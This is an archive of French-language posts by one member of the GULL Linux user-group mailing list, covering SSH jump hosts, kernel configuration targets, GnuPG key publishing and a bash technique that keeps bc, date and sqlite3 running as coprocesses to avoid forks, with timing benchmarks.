http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Écoutez Protection des données: l'Europe bouge, et la Suisse? - 26.05.2018 dans Podcasts

[felix]

Voici le lien RTS pour le même podcast ( sans passer par Apple(TM) ;)

  
https://www.rts.ch/info/dossiers/quinze-minutes/9588070-protection-des-donnees-l-europe-bouge-et-la-suisse-.html

On Fri, Jun 01, 2018 at 08:17:04PM +0200, Miçhael Parchet wrote:

> Écoutez Protection des données: l'Europe bouge, et la Suisse?
>  - 26.05.2018 de Quinze minutes - La 1ere dans Podcasts.
> https://itunes.apple.com/ch/podcast/quinze-minutes-la-1ere/id154711147?l=fr=2=1000412319253

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: ssh via proxy

[felix]

Re,

On Wed, May 02, 2018 at 07:54:58AM +0200, Julien Escario wrote:
> Alors, il existe également un mécanisme permettant de forwarder
> simplement le socket de ssh-agent au travers d'une connexion ssh (et
> donc l'authentification par clé privée qui en découle).

> Du coup, tu peux également :
> local:$ ssh proxyuser@proxyhost
> proxyhost:$ ssh user@finaldest
> finaldest:$

Oui, en utilisant l'agent ssh, on peut propager sa propre clef sur
chaque poste que l'on contacte (A condition que l'opération soit
supportée sur lesdits postes).

A noter que dans ce cas, les données sont
  déchiffrées et rechiffrées sur chaque étape:

 - ssh-agent:

   A  B  C

   données chiffré de A à B, puis de B à C

 - ssh-proxy

   A  B
   A C

   données chiffrées de A à B, canal de A à C, assuré par B.
   données chiffrées de A à C

C'est différent!

Pour proxy:

 - B ne peut pas connaitre se qui se discute entre A et C
 - B n'a pas besoin de shell

Contre:

 - Entre A et B, il y a bien souvent un modem ADSL, càd un ``goullet''
   et c'est précisement sur ce troncon que l'on chiffre des données
   chiffrées. -> réduction de la bande passante.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Truc et astuces: ssh via proxy

[felix]

Bonjour,

Pour joindre avec ssh, une machine distante non accessibles aux reseaux
auxquels je suis connecté, il faut passer par une machine qui est connecté
à ladite machine et connecté sur Internet ou un de mes reseaux...

Quelque chose comme:

 $ ssh -o ProxyCommand='ssh -e none proxyuser@proxyhost nc finaldest 22' 
user@finaldest

ou

 $ ssh -f -L :finaldest:22 proxyuser@proxyhost sleep 5 &&
  ssh -p  -o HostKeyAlias=finaldest -l user localhost

mais voici la nouvelle option `-J` de ssh:

 $ ssh -J proxyuser@proxyhost user@finaldest

C'est plus court et plus lisible.

-- 
 Félix
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] les langages de programmations made in switzerland.

[felix]

Bonjour,

On Mon, Apr 30, 2018 at 02:46:09PM +0200, e-h...@bluewin.ch wrote:
> ... les langages informatiques en programmations, made in 
> switzerland ?

Ecma International, qui edite EcmaScript (référence de JavaScript)
est basée à Genève (rue du Rhône). Mais cela en fait-il un
language ``made in switzerland''?


--
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] crypter les mails sensibles

[felix]

On Thu, Apr 19, 2018 at 05:10:35PM +0200, Frederic Dumas wrote:

> Tant que le destinataire ne te communique pas sa clé, tu ne peux 
> chiffrer d’e-mail à son intention. La décision d’envoyer un email 
> chiffré ne dépend donc pas de l’émetteur, comme l’intuition le 
> laisserait penser, mais du destinataire, qui n’apporte généralement à 
> l’affaire aucune bonne volonté (il voit plutôt ce type de requête 
> comme une obscure contrainte).

En principe, les clef ``publiques'', sont ``publiées''!

Donc, si tu installes correctement ton paquet GnuPG et que tu publies
tes clefs sur un serveur publique, tous le monde peut t'envoyer un
message chiffré.

Encore faut-il que...

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] [Chtinux] crypter les mail sensible

[felix]

Bonjour,

On Thu, Apr 19, 2018 at 02:04:51PM +, Sebseb01 wrote:
> ... itopie organise mardi prochain (28 avril).

Qu'on se le dise: le ``prochain mardi 28 avril'', ce sera en 2020!

Est-tu sûr de ton propos, Seb?

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Compilation du noyau - automatisation du .config ?

[felix]

Donc oui,

On Tue, Apr 17, 2018 at 04:19:23PM +0200, felix wrote:
>   localmodconfig  - Update current config disabling modules not loaded
>   localyesconfig  - Update current config converting local mods to core

avec des outils comme lspci, dmesg...

 $ lspci -k | sed 's/^.*Kernel .*: \(.*\)/\1=/p;d' | sort -u |
   grep -if - .config | cat -n


 a comparer avec

 $ lspci -k | sed 's/^.*Kernel .*: \(.*\)/\1/p;d' | sort -u | cat -n

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Compilation du noyau - automatisation du .config ?

[felix]

On Tue, Apr 17, 2018 at 03:24:02PM +0200, felix wrote:
> Je suis comme Marc, mais je me souviens avoir tapé ``make help'' y'a 
> pas très longtemp, y'avait une floppée de trucs!
> 
> Je pense que c'est à approfondir!
$ make help
Cleaning targets:
  clean   - Remove most generated files but keep the config and
enough build support to build external modules
  mrproper- Remove all generated files + config + various backup 
files
  distclean   - mrproper + remove editor backup and patch files

Configuration targets:
  config  - Update current config utilising a line-oriented program
  nconfig - Update current config utilising a ncurses menu based
program
  menuconfig  - Update current config utilising a menu based program
  xconfig - Update current config utilising a Qt based front-end
  gconfig - Update current config utilising a GTK+ based front-end
  oldconfig   - Update current config utilising a provided .config as 
base
  localmodconfig  - Update current config disabling modules not loaded
  localyesconfig  - Update current config converting local mods to core
  silentoldconfig - Same as oldconfig, but quietly, additionally update deps

  defconfig   - New config with default from ARCH supplied defconfig
  savedefconfig   - Save current config as ./defconfig (minimal config)
  allnoconfig - New config where all options are answered with no
  allyesconfig- New config where all options are accepted with yes
  allmodconfig- New config selecting modules when possible
  alldefconfig- New config with all symbols set to default
  randconfig  - New config with random answer to all options
  listnewconfig   - List new options
  olddefconfig- Same as silentoldconfig but sets new symbols to their
default value
  kvmconfig   - Enable additional options for kvm guest kernel support
  xenconfig   - Enable additional options for xen dom0 and guest kernel 
support
  tinyconfig  - Configure the tiniest possible kernel

J'aime bien l'option ``randconfig''!

Mais donc, il y a la possibilité d'utiliser un ficher de preconfig lié à
l'architecture. Voire savedefconfig et defconfig.

L'optione localmodconfig déjà mentionnée dans ce thread, permet de selectionner
les modules actuellement chargés (même s'ils ont été chargé inutilement, par
un script de detection, par exemple).

...

J'aime bien:
  fdimage  - Create 1.4MB boot floppy image (arch/x86/boot/fdimage)
  fdimage144   - Create 1.4MB boot floppy image (arch/x86/boot/fdimage)
  fdimage288   - Create 2.8MB boot floppy image (arch/x86/boot/fdimage)

Là, 'faudra jouer serré!

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Compilation du noyau - automatisation du .config ?

[felix]

Bonjour Marc,

On Mon, Apr 16, 2018 at 08:14:53PM +0200, Marc Mongenet wrote:
> Je serais intéressé de connaître
> avantages et inconvénients d'un build custom aujourd'hui.
J'avais lu, sur:

   https://wiki.openwrt.org/toh/pcengines/apu

   ``Custom OpenWrt image

 We are trying to compile with all optimization. This includes:

X86-64 architecture,
AMD APU gcc optimization (this can boost performance around 50% on
some applications),
SMP support (dual core),
GIOP header support,
LED support, and more.
''

Dans l'absolu, avoir un kernel léger, c'est pratique pour booter, stoquer,
etc... Pour les nouveaux ``Objets de l'Internet'' (on va mettre une majusule
à objet aussi, tant qu'à faire), c'est très utile.

Plus rationnel, c'est nécessairement plus rapide, plus efficace et moins
gourmand... (- Je ne vois d'ailleur pas comment M$ espère régatter dans ce
domaine, il est tellement habitué à enjoidre à consommer plus! ;-)

...

> Le 16 avril 2018 à 15:39, Frederic Dumas  a écrit :
> >
> > Bonjour,
> >

> > La compilation du noyau est pour moi un exercice frustrant, ...
> > dans le doute »... les acronymes abscons du .config prend un temps fou.
Je suis d'accord: Si tu comprend rien, alors c'est pas utile!

> > Existe-t-il un outil qui génèrerait automatiquement, au moins 
> > partiellement, le .config utilisé lors de la compilation du noyau, 
> > en scrutant par exemple le hardware existant sur la machine cible ?
Je suis comme Marc, mais je me souviens avoir tapé ``make help'' y'a 
pas très longtemp, y'avait une floppée de trucs!

Je pense que c'est à approfondir!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] mailman jusqu'a quand ?

[felix]

Bonjour,

On Mon, Apr 02, 2018 at 06:56:26PM +, Sebseb01 wrote:
...
Received: from government.linux-gull.ch (localhost.localdomain [127.0.0.1])
by government.linux-gull.ch (Postfix) with ESMTP id 5C77F191088A;
Tue,  3 Apr 2018 17:10:08 +0200 (CEST)

Désolé: lundi je n'étais pas dispo et aujourd'hui, j'avais quelques trucs
à faire avant de m'intéresser au spams usuels reçus sur le serveur
mailman...

A propos de mailman, c'est (provisoirement) moi, qui assure que les mails
soient filtrés "correctements"... Ce serveur mailman est plus ``survivant''
que ``fonctionnel''. Il est clair qu'une migration s'impose, mais pour
l'instant ça le fait... (avec ssl;)

Malheureusement, je n'étais pas présent lors de l'assemblée générale du
gull. Je suis donc comme la majorité d'entre vous, à faire autre chose,
en attendant que quelques chose se dessine... 

( A propos, j'ai eu un petit souci ``hard'' qui s'est résolu de lui-même, il
  y a une dizaine de jours... Du fait que tout va bien, je n'en parlerais pas
  plus sur la liste, mais j'aprécierais un message en privé. ;)

A bientôt les tous!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Cartouche d'encre HP à donner

[felix]

A donner, contre bon usage**

  On m'a donné une cartouche d'encre HP: 21XL noir
  cause erreur d'achat et boite ouverte.

Compatible:

Imprimantes Color Inkjet

Imprimante jet d'encre couleur HP Deskjet 3940 (C9050A)
Imprimante HP Deskjet D2360 (C9079A)
Imprimante HP Deskjet D2460 (CB611A)
HP Deskjet D1530 Printer (CB708A)
Imprimante HP Deskjet D1560 (CB710A)

Imprimantes tout-en-un jet d'encre

Imprimante tout-en-un HP Deskjet F4180 (CB584A)
Imprimante tout-en-un HP Deskjet F2180 (CB596A)
Imprimante tout-en-un HP Deskjet F2290 (CB690A)
Tout-en-un HP PSC 1410 Imprimante (CC302A)
Tout-en-un HP Officejet 4355 Imprimante (Q8091A)
Imprimante tout-en-un HP Deskjet F380 (Q8134A)
Imprimante tout-en-un HP Deskjet F335 (Q8137A)
Imprimante tout-en-un HP Deskjet F390 (Q8142A)

Si quelqu'un aurrait quelque-chose à en faire** et pourrait se
trouver sur l'un de mes itinéraires (suisse romande), je la dépose
volontier lors de mon prochain passage.

** Pas pour imprimer de la propagande extremiste, images illégalles ou
   autre ``mauvais usage''.

-- 
 Félix Hauri
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Faut-il réhabiliter Perl comme langage de scripting système?

[felix]

Coucou,

Oui, je vais dire un mot:

On Sat, Mar 10, 2018 at 08:55:28AM +0100, Marc SCHAEFER wrote:
> On Sat, Mar 10, 2018 at 01:07:41AM +0100, Daniel Cordey wrote:

> Plus sérieusement, en ce qui me concerne, dans un cursus de développement
> logiciel aujourd'hui, je proposerais:
> 
>- le C pour appliquer les notions d'architectures des ordinateurs,
>  y compris la portabilité
> 
>- le python pour voir un langage de script générique (appliqués aux
>  calculs mathématiques ainsi qu'au développement Web p.ex. avec Django,
>  le fonctionnel, l'OO)
> 
>- le Java car c'est le langage Entreprise de référence aujourd'hui et
>  la JVM est très importante dans plein de langages
> 
>- le Javascript car c'est l'assembleur portable d'aujourd'hui

Sans oublier les languages du web: HTML (3 à 5) et CSS(>=2)!

( mais, les faire bosser sur LaTeX, pour leur rapports et présentations,
  avec des outils comme gnuplot, dotty... Cela se fait encore beaucoup
  dans les universités et est très utile pour la cohérence et la pérénité
  des documents... -> ``R'' )

> et pour ceux qui vont plus dans la direction "système":
> 
>- bash
Je dirais ``Shell'', avec des challenges utilisant busybox et/ou dash!

En effet, l'``administration'' doit concerner l'embarqué, les serveurs
et les desktops... Dans bien des cas, ``bash'' n'est pas installé, soit
pour des raisons de mémoire, soit pour des raisons de sécurité (trop
complexe).

bash doit cependant occuper une part importante, il devient de plus en
plus un language de programmation... utilisant des raccourcis permettant
par exemple une interaction bidirectionnelle avec un sous-process (voire
perl Open2 et perlipc ;)

Voici comment dialoguer avec un serveur mysql distant (sans port TCP),
en utilisant ssh et bash. 
  $ read tdir < <(mktemp -d)
  $ mkfifo $tdir/fifo.{out,err}
  $ ssh -f -L $tdir/mysqld.sock:/var/run/mysqld/mysqld.sock $sqlhost sleep 5
  $ exec 5> >(exec stdbuf -oL -eL mysql -S $tdir/mysqld.sock -p'myPassword' \
  database >$tdir/fifo.out 2>$tdir/fifo.err )
  $ exec 6<$tdir/fifo.out
  $ exec 7<$tdir/fifo.err 
  $ rm -fR $tdir

  $ echo >&5 'SELECT CURRENT_USER,CURRENT_DATE,CURRENT_TIME;'
  $ while read -t .01 -u 6 sqlout;do echo ">" $sqlout;done
  > CURRENT_USER CURRENT_DATE CURRENT_TIME
  > felix@localhost 2018-03-12 10:48:58
  $ while read -t .01 -u 6 sqlerr;do echo "E:" $sqlerr;done

  $ ps --sid $(ps ho sid $$) fw


> et pour ceux qui vont plus dans l'embarqué:
> 
>- C++
> 
>- assembleur (code bootstrap notamment)
> 
> Quant à Perl, PHP, Ruby, etc, je les proposerais en
> option pour investiguer un axe en particulier (Perl: regexp,
> Moose, Mojolicious), PHP (Laravel), Ruby (On Rails).

Je pense, pour ma part, que PHP devient nécessaire en raison du
nombre d'applications que l'on rencontre tous azimuths.

Ne suis pas fan, bien au contraire, mais il m'a été utile de le
connaître pour debugguer des CMS installés, mais égallement pour
désosser des ``virus'' (venu du froid) qui transforment les
serveurs web en zombies...

Pour ce qui est de Perl, je dois dire que je peux ``penser'' en Perl.
Ce qui rend les scéances de ``Brainstorming'', en solo devant mon
écran, plutôt efficaces. (Ce que je pond n'est pas forcement très
lisible, heureusement, perl regorge d'outils tels que perltidy,
debug et autres critic - merci Xavier Gattuso -...)

> Il y a des gens qui utilisent Caml? :)
Il y a des gens qui utilisent LISP! J'ai même vu, en 2017, du Tcl/Tk!!

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash connector

[felix]

> On Thu, Feb 15, 2018 at 07:56:21AM +0100, Laurent Franceschetti wrote:
> > Surtout quel est le problème que cette méthode résoud, et quelle est l’idée 
> > centrale de la méthode?
> Eliminer les ``forks'' répétitifs qui peuvent être évités.

Autre exemple: Il y a un outil installé avec `apt install byobu`, qui
se trouve dans /usr/bin, qui se nomme byobu-ulevel. Il fait pas mal
de forks vers `bc`.

Il s'agit d'un script bash, écrit façon cuillère à pot sur un jeu de lego.

Bref un petit test (sur un raspberry-pi v3):

  $ export BYOBU_PYTHON="python"   # pour éviter des tests inutiles
  $ export TIMEFORMAT='Times: [U: %U, S: %S] -> %P%% x %Rs' # %R est 
significatif

  $ time byobu-ulevel -c 612.1234 -m -273.15 -x 1555.5 -t vbars_8
  ▃
  Times: [U: 0.090, S: 0.020] -> 32.27% x 0.341s

  $ time byobu-ulevel -c 612.1234 -m -273.15 -x 1555.5 -u "· █" -w 80
  
██··
  Times: [U: 0.210, S: 0.150] -> 12.34% x 2.915s

Bon, de 0.3 secondes à 3 secondes pour aligner 80 caractères, il y a
à optimiser!!

Voici ma version un poil optimisé, toujours **sans connecteur**

  $ time ./byobu-ulevel_noconnector -c 612.1234 -m -273.15 -x 1555.5 -t vbars_8
  ▄
  Times: [U: 0.090, S: 0.050] -> 53.61% x 0.261s

  $ time ./byobu-ulevel_noconnector -c 612.1234 -m -273.15 -x 1555.5 -u "· █" 
-w 80
  
██··
  Times: [U: 0.080, S: 0.030] -> 45.50% x 0.242s

Ok, ça va nettement plus vite dans le 2ème cas, et un poil dans le 1er.
Voici la même version optimisé, mais avec mon ``shell_connector'':

  $ time ./byobu-ulevel -c 612.1234 -m -273.15 -x 1555.5 -t vbars_8
  ▄
  Times: [U: 0.110, S: 0.010] -> 66.58% x 0.180s

  $ time ./byobu-ulevel -c 612.1234 -m -273.15 -x 1555.5 -u "· █" -w 80
  
██··
  Times: [U: 0.100, S: 0.040] -> 68.40% x 0.205s

Le ``shell connector'' est clairement efficace!

Voici enfin une version totallement ré-écrite, avec le connector inclu
en début du script:

  $ time ./byobu-ulevel-new.sh -c 612.1234 -m -273.15 -x 1555.5 -t vbars_8
  ▃
  Times: [U: 0.040, S: 0.010] -> 62.01% x 0.081s

  $ time ./byobu-ulevel-new.sh -c 612.1234 -m -273.15 -x 1555.5 -u "· █" -w 80
  
██··
  Times: [U: 0.050, S: 0.000] -> 58.90% x 0.085s

Petite récap:

  byobu-ulevel  version originale 0.356s
  ./byobu-ulevel_noconnectorversion optimisée 0.243s
  ./byobu-uleveloptimisée + connecteur bc 0.177s
  ./byobu-ulevel-new.sh réécriture + connecteur bc0.088s

Mes différentes version sont disponibles à

   http://f-hauri.ch/vrac/byobu-ulevel_alternatives.tgz

Comme quoi, si le bash tend à devenir un ``language de programmation'',
il en est encore très loin!

Par contre, pour le prototype, il le fait!!

De là, si quelqu'un veut le ré-écrire pour le rendre plus efficace,
alors je préfèrerai du ``C'' qui pourra en faire un truc léger voire
instantané, plutôt que du python, perl, php ou autre ecmascript,
qui vont nous faire grapiller quelques microsecondes.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] {Content?} Re: Truc et astuces: bash connector

[felix]

Re,

On Thu, Feb 15, 2018 at 11:25:04PM +0100, Laurent Franceschetti wrote:
> Désolé si je passe pour un Philistin, mais pourquoi ne pas faire ça en
> séquentiel et en Python? 

Parce que shell a ses applications. En particulier, l'administration
système implique shell. Que ``bash'' est l'un des plus répandus et
reste tres utile pour toutes les tâches liées aux fichiers, montages,
interaction avec des applis, etc...

Bash est interactif, cette démo est réalisable en ligne de commande,
les sous-process restent ouverts, accessibles et efficaces...

Si je l'avais fais en perl, c'aurait été nettement plus rapide egallement!
Python est bien pour developper ou prototyper des applications...
On aurait pu le faire en PHP ou javascript, mais ce n'est pas le propos.

Avec ce système, mon script passe de 120" à 8", en restant bash!
Ceci démontre assez bien le coût des forks.

J'ai déjà gagné 112 secondes sans changer de language, alors si
pour gagner 2 secondes supplémentaires, je dois passer à Python...

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash connector

[felix]

On Thu, Feb 15, 2018 at 09:01:27PM +0100, felix wrote:
> > Surtout quel est le problème que cette méthode résoud, et quelle est l’idée 
> > centrale de la méthode?
> 
> Eliminer les ``forks'' répétitifs qui peuvent être évités.
> ...
>   $ ps --sid $(ps ho sid $$) fw
> PID TTY  STAT   TIME COMMAND
>4625 pts/2Ss 0:00 -bash
>9146 pts/2S  0:00  \_ /usr/bin/bc -l
>9150 pts/2S  0:00  \_ /bin/date -f - +%s
>9188 pts/2R+ 0:00  \_ ps --sid 4625 fw

J'allais oublier:

Tant qu'à faire de systématiser les dialogues avec des sous-tâches,
la suite serait le *connecteur de DB*, avec la possibilité de se
connecter à une base mysql, postgresql ou sqlite pour manipuler
des tables (temporaires ou non) en plusieurs étapes (voire l'exemple
qui utilise sqlite3: `# apt install sqlite3`).

  $ bash shell_connector.sh

Ce script génère 4 sorties:
Un `df -k` avec la colone `%` recalculée, plus le calcul d'une ligne `Total`.

  /dev   devtmpfs0.00K7.81G0%0.00%
  /run   tmpfs  57.47M1.56G4%3.59%
  /  ext4   49.25G   74.23G   67%   66.35%
  ...
  Total 49.34G  104.11G

un `ls -ltr` via `ls -l` et sqlite pour le tri par date, ainsi qu'un
calcul de la taille en ``lisible par humain'' avec 2 décimales, la
ligne `Total` contient une somme calculée par `bc` et une autre par `SQL`.

  permsuser     date   size  name
   -rw-r--r--  felix2018-02-14 17:59 7.93Kb  shell_connector.sh
   -rw-r--r--  felix2018-02-15 20:1712.14Kb  scTestFile.raw.gz
by bc:  20.07Kb,   by sql:  20.07Kb  Total

La date courrante à une seconde près,

  Last SQL read : jeu 15 fév 21:09:20
  now by date   : jeu 15 fév 21:09:20
  now by bash   : jeu 15 fév 21:09:20

Et enfin le résultat de la commande `ps --sid $(ps ho sid $$) fw`:

PID TTY  STAT   TIME COMMAND
   6381 pts/1Ss 0:00 -bash
   6392 pts/1S+ 0:00  \_ bash shell_connector.sh
   6396 pts/1S+ 0:00  \_ /usr/bin/bc -l
   6401 pts/1S+ 0:00  \_ /bin/date -f - +%s
   6406 pts/1S+ 0:00  \_ /usr/bin/sqlite3 -separator ? -header 
/dev/shm/test.sqlite
   6414 pts/1R+ 0:00  \_ ps --sid 6381 fw

Voire le script, repérer les lignes contenant `mySqlite` on `SQLIN`:

En gros:

  newSqlConnector $SQLITE "-separator $'\t' -header /dev/shm/test.sqlite"

  cat >&$SQLIN <<-EOSQLInit
DROP TABLE IF EXISTS files;
CREATE TABLE files (perms, user, date UNSIGNED BIGINT,
size UNSIGNED BIGINT,name);
EOSQLInit

  ...
  while read perm blk user group size month day yot name;do
...
echo >&$SQLIN "INSERT INTO files 
values('$perm','$user',$Date,$size,'$name');"
  done < <(LANG=C /bin/ls -l|tail -n+2)

  mySqlite myarray "SELECT * from files order by date;"

  for line in "${myarray[@]}";do
IFS=$'\t' read perm user date size name <<<"$line"
...
  done

  mySqlite stot 'SELECT SUM(size) FROM files;'


-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash connector

[felix]

On Thu, Feb 15, 2018 at 07:56:21AM +0100, Laurent Franceschetti wrote:
> 
> Surtout quel est le problème que cette méthode résoud, et quelle est l’idée 
> centrale de la méthode?

Eliminer les ``forks'' répétitifs qui peuvent être évités.

Petit exemple: Voici un fichier:

  $ wget http://f-hauri.ch/vrac/scTestFile.raw.gz
  scTestFile.raw.gz   100%[===>]  12.14K  --.-KB/s  in 0.004s

Qui contient des lignes (1000) de montants suivits de dates:

  $ zcat scTestFile.raw.gz | (head -n3;tail -n7)
   2032.55  Jul 22 00:12:45 2007
   6229.85  Apr 19 20:31:15 2010
   3089.75  Sun Nov  2 08:48:10 2014
   3816.30  Sat Nov 19 21:12:50 2016
   7934.70  May 23 16:47:40 2008
   2969.45  Aug 30 2017 01:43:45
   3569.00  2011-12-29 17:07:20
594.40  Thu Mar  5 05:44:40 2015
   9546.85  Dec 31 2015 06:56:45
   3445.75  2016-07-14 18:43:15

Pour
  - unifier la présentation des dates et
  - calculer le total des montants,
je peux:

  $ tot=0.0
  $ time while read val date;do
tot=$(bc -l <<<"$tot+$val")
printf "%11.2f %(%a %d %b %Y %T)T\n" $val $(
date -d "$date" +%s
)
done < <(zcat scTestFile.raw.gz) > >(head -n3;tail -n7)
  2032.55 dim 22 jui 2007 00:12:45
  6229.85 lun 19 avr 2010 20:31:15
  3089.75 dim 02 nov 2014 08:48:10
  3816.30 sam 19 nov 2016 21:12:50
  7934.70 ven 23 mai 2008 16:47:40
  2969.45 mer 30 aoû 2017 01:43:45
  3569.00 jeu 29 déc 2011 17:07:20
   594.40 jeu 05 mar 2015 05:44:40
  9546.85 jeu 31 déc 2015 06:56:45
  3445.75 jeu 14 jui 2016 18:43:15
  real2m0.433s
  user0m20.960s
  sys 0m24.550s

Euh oui, je l'ai fait sur un raspberry-pi... 2 minutes!

  $ echo $tot
  4674781.85

Bon, à présent voyons:

  $ wget https://f-hauri.ch/vrac/shell_connector.sh
  shell_connector.sh  100%[===>]   7.93K  --.-KB/sin 0.005s 
 

  $ . shell_connector.sh 
  $ newConnector /usr/bin/bc -l 0 0 
  $ newConnector /bin/date '-f - +%s' @0 0
  $ echo >&$BCIN tot=0

Oui, je stoque la variable tot dans `bc`...

  $ time while read val date ;do
  echo >&$BCIN tot=tot+$val
  myDate "$date" mDate
  printf "%11.2f %(%a %d %b %Y %T)T\n" $val $mDate
done < <(zcat scTestFile.raw.gz) > >(head -n3;tail -n7)
  2032.55 dim 22 jui 2007 00:12:45
  6229.85 lun 19 avr 2010 20:31:15
  3089.75 dim 02 nov 2014 08:48:10
  3816.30 sam 19 nov 2016 21:12:50
  7934.70 ven 23 mai 2008 16:47:40
  2969.45 mer 30 aoû 2017 01:43:45
  3569.00 jeu 29 déc 2011 17:07:20
   594.40 jeu 05 mar 2015 05:44:40
  9546.85 jeu 31 déc 2015 06:56:45
  3445.75 jeu 14 jui 2016 18:43:15
  real0m8.043s
  user0m2.370s
  sys 0m0.800s

Voilà, en évitant ~2000 forks, je le fais en 8" au lieu de 120"!

  $ myBc tot montotal
  $ echo $montotal 
  4674781.85

Tant que mon shell courant existe et que je ne ferme pas les
descripteurs, je peux continuer à les utiliser...

  $ ps --sid $(ps ho sid $$) fw
PID TTY  STAT   TIME COMMAND
   4625 pts/2Ss 0:00 -bash
   9146 pts/2S  0:00  \_ /usr/bin/bc -l
   9150 pts/2S  0:00  \_ /bin/date -f - +%s
   9188 pts/2R+ 0:00  \_ ps --sid 4625 fw

Voilà, j'espère avoir montré l'intérêt de la méthode.
Bonne soirée!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash connector

[felix]

Alors j'avais écrit:

On Fri, Feb 09, 2018 at 10:02:05AM +0100, felix wrote:
>   $ ps --tty pts/20 fw
> PID TTY  STAT   TIME COMMAND
>   29019 pts/20   Ss 0:00 bash
>   30944 pts/20   S  0:00  \_ bash
>   30945 pts/20   S  0:00  |   \_ /usr/bin/bc -l
>   32615 pts/20   S  0:00  \_ bash
>   32616 pts/20   S  0:00  |   \_ /bin/date -f - +%s
>3162 pts/20   R+ 0:00  \_ ps --tty pts/20 fw

Et y'en a pas un pour me dire que si au lieu de

newConnector() {
local command="$1" cmd=${1##*/} args="$2" check="$3" verif="$4"
...
eval "exec $fd> >(LANG=C stdbuf -o0 $command $args >$FIFO 2>&1)
...

j'avais mis un ``exec'':

newConnector() {
local command="$1" cmd=${1##*/} args="$2" check="$3" verif="$4"
... 
eval "exec $fd> >(LANG=C exec stdbuf -o0 $command $args >$FIFO 2>&1)
...

j'aurais pu libérer le bash intermédiaire:

PID TTY  STAT   TIME COMMAND
   3876 pts/20   Ss 0:00 bash
   3907 pts/20   S  0:00  \_ /usr/bin/bc -l
   4959 pts/20   S+ 0:00  \_ /bin/bash ./shell_connector.test
   4963 pts/20   S+ 0:00  \_ /usr/bin/bc -l
   4968 pts/20   S+ 0:00  \_ /bin/date -f - +%s
   4973 pts/20   S+ 0:00  \_ /usr/bin/sqlite3 -separator ? -header 
/dev/shm/test.sqlite
   4981 pts/20   R+ 0:00  \_ ps --sid 3876 fw

... on se demande si y'en a qui suivent!

;-)

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash connector

[felix]

Alors j'avais écrit:

On Fri, Feb 09, 2018 at 10:02:05AM +0100, felix wrote:
>   $ ps --tty pts/20 fw
> PID TTY  STAT   TIME COMMAND
>   29019 pts/20   Ss 0:00 bash
>   30944 pts/20   S  0:00  \_ bash
>   30945 pts/20   S  0:00  |   \_ /usr/bin/bc -l
>   32615 pts/20   S  0:00  \_ bash
>   32616 pts/20   S  0:00  |   \_ /bin/date -f - +%s
>3162 pts/20   R+ 0:00  \_ ps --tty pts/20 fw

Et y'en a pas un pour me dire que si au lieu de

newConnector() {
local command="$1" cmd=${1##*/} args="$2" check="$3" verif="$4"
...
eval "exec $fd> >(LANG=C stdbuf -o0 $command $args >$FIFO 2>&1)
...

j'avais mis un ``exec'':

newConnector() {
local command="$1" cmd=${1##*/} args="$2" check="$3" verif="$4"
... 
eval "exec $fd> >(LANG=C exec stdbuf -o0 $command $args >$FIFO 2>&1)
...

j'aurrais pu libérer le bash intermédiaire:

PID TTY  STAT   TIME COMMAND
   3876 pts/20   Ss 0:00 bash
   3907 pts/20   S  0:00  \_ /usr/bin/bc -l
   4959 pts/20   S+ 0:00  \_ /bin/bash ./shell_connector.test
   4963 pts/20   S+ 0:00  \_ /usr/bin/bc -l
   4968 pts/20   S+ 0:00  \_ /bin/date -f - +%s
   4973 pts/20   S+ 0:00  \_ /usr/bin/sqlite3 -separator ? -header 
/dev/shm/test.sqlite
   4981 pts/20   R+ 0:00  \_ ps --sid 3876 fw

... on se demande si y'en a qui suivent!
;-)


-- 
